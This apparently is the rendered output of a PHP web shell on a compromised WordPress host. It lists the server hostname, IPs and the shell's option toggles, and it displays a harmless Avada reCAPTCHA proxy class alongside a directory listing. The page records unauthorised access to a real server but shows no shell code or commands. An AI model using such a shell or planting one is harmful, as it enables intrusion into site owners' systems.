🇳🇦🇲🇪♯➤ webm004.cluster127.gra.hosting.ovh.net 🇻♯➤ 6.18.42-ovh-vps-grsec-zfs+ #1 SMP 🇾♯➤ 2026
𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 54.36.91.62 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.191
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ _dyuweyrj4,_dyuweyrj4r,dl
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/docteuh/www/wordpress/dist/recaptcha//class-fusion-recaptcha.php
<?php
/**
* A proxy class for recaptche.
*
* @author ThemeFusion
* @copyright (c) Copyright by ThemeFusion
* @link https://avada.com
* @package Avada Core
* @subpackage Core
* @since 3.9.2
*/
// Do not allow directly accessing this file.
if ( ! defined( 'ABSPATH' ) ) {
exit( 'Direct script access denied.' );
}
/**
* A proxy class for reCAPTCHA.
*
* @since 3.9.2
*/
class Fusion_ReCaptcha {
/**
* The reCAPTCHA object.
*
* @access public
* @since 3.9.2
* @var object reCAPTCHA
*/
public $recaptcha;
/**
* Class constructor.
*
* @param string $secret The secret that will be passed-on to reCAPTCHA.
* @param null $request_method Not currently used.
*/
public function __construct( $secret, $request_method = null ) {
if ( ! ini_get( 'allow_url_fopen' ) ) {
$this->recaptcha = new \ReCaptcha\ReCaptcha( $secret, new \ReCaptcha\RequestMethod\CurlPost() );
} else {
$this->recaptcha = new \ReCaptcha\ReCaptcha( $secret );
}
}
}
| 𝗡𝗔𝗠𝗘 |
𝗦𝗜𝗭𝗘 |
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛 |
𝗨𝗦𝗘𝗥 |
𝗦𝗧𝗔𝗧𝗨𝗦 |
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦 |
| .. | -- | 27 Sep 2026 4.20 AM | docteuh / users | 0755 | |
| src | -- | 13 Sep 2026 4.02 AM | docteuh / users | 0755 | |
| templates | -- | 13 Sep 2026 4.02 AM | docteuh / users | 0755 | |
| | | | | |
| class-fusion-recaptcha.php | 0.988 KB | 20 Nov 2023 7.12 PM | docteuh / users | 0644 | |
| site-health-info.php | 4.053 KB | 21 May 2026 2.34 PM | docteuh / users | 0644 | |